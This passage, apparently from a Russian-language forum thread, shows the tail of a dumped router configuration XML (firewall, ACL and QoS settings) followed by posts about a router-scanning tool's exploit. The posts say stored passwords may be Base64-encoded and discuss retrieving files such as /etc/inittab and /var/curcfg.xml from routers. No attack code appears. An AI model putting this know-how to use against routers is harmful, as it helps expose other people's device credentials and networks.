Protocol="TCP/UDP" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> <IpFilterInstance InstanceID="4" Name="2" Status="1" Priority="0" Interface="ALL" SourceIPStart="87.216.1.1" SourceIPEnd="87.216.1.254" DestIPStart="" DestIPEnd="" Protocol="ICMP" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> </IpFilter> <DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/> <ACL NumberOfInstances="9"> <ObjExtention MaxInstanceNum="9"/> <ACLInstance InstanceID="1" X_Service="ACS" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="2" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="3" X_Service="ICMP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="4" X_Service="TELNET" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="5" X_Service="HTTP" X_Direction="WAN" X_StartIpAddr="87.216.1.1" X_EndIpAddr="87.216.1.254"/> <ACLInstance InstanceID="6" X_Service="ICMP" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="7" X_Service="TELNET" X_Direction="WAN" X_StartIpAddr="87.216.1.1" X_EndIpAddr="87.216.1.254"/> <ACLInstance InstanceID="8" X_Service="FTP" X_Direction="WAN" X_StartIpAddr="1.1.1.1" X_EndIpAddr="1.1.1.1"/> <ACLInstance InstanceID="9" X_Service="FTP" X_Direction="LAN" X_StartIpAddr="1.1.1.1" X_EndIpAddr="1.1.1.1"/> </ACL> </FilterModeInstance> </FilterMode> </X_FireWall> <QueueManagement Enable="0" X_BandWidth="0" X_QueueType="PQ" MaxQueues="4" MaxClassificationEntries="32"> <Queue NumberOfInstances="4"> <ObjExtention MaxInstanceNum="4"/> <QueueInstance InstanceID="1" QueueEnable="1" QueueWeight="1"/> <QueueInstance InstanceID="2" QueueEnable="1" QueueWeight="1"/> <QueueInstance InstanceID="3" QueueEnable="1" QueueWeight="1"/> <QueueInstance InstanceID="4" QueueEnable="1" QueueWeight="1"/> </Queue> <Policer NumberOfInstances="4"> <ObjExtention MaxInstanceNum="4"/> <PolicerInstance InstanceID="1" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/> <PolicerInstance InstanceID="2" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/> <PolicerInstance InstanceID="3" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/> <PolicerInstance InstanceID="4" PolicerEnable="1" CommittedRate="0" CommittedBurstSize="0" PeakRate="0" PeakBurstSize="0"/> </Policer> </QueueManagement> </InternetGatewayDevice> </InternetGatewayDeviceConfig> P.S. Судя по http://www.securitylab.ru/analytics/483834.php пароль может быть в BASE64
Интересно от чего зависит наличие /var/curcfg.xml. Я раньше сколько ни пробовал, /etc/inittab скачивается, а curcfg.xml нет.
Это нормально. Эксплойт смог добыть данные точки доступа, но доступа к BSSID при таком раскладе нет. RS всегда добывает то, что способен добыть. Посылая подобные скриншоты, предже всего задавайте себе вопрос "А должен ли RS добыть что-то ещё? Если да, каким образом?" На второй вопрос ответ должен быть чисто техническим, в виде алгоритма получения данных, а также проверенным лично.
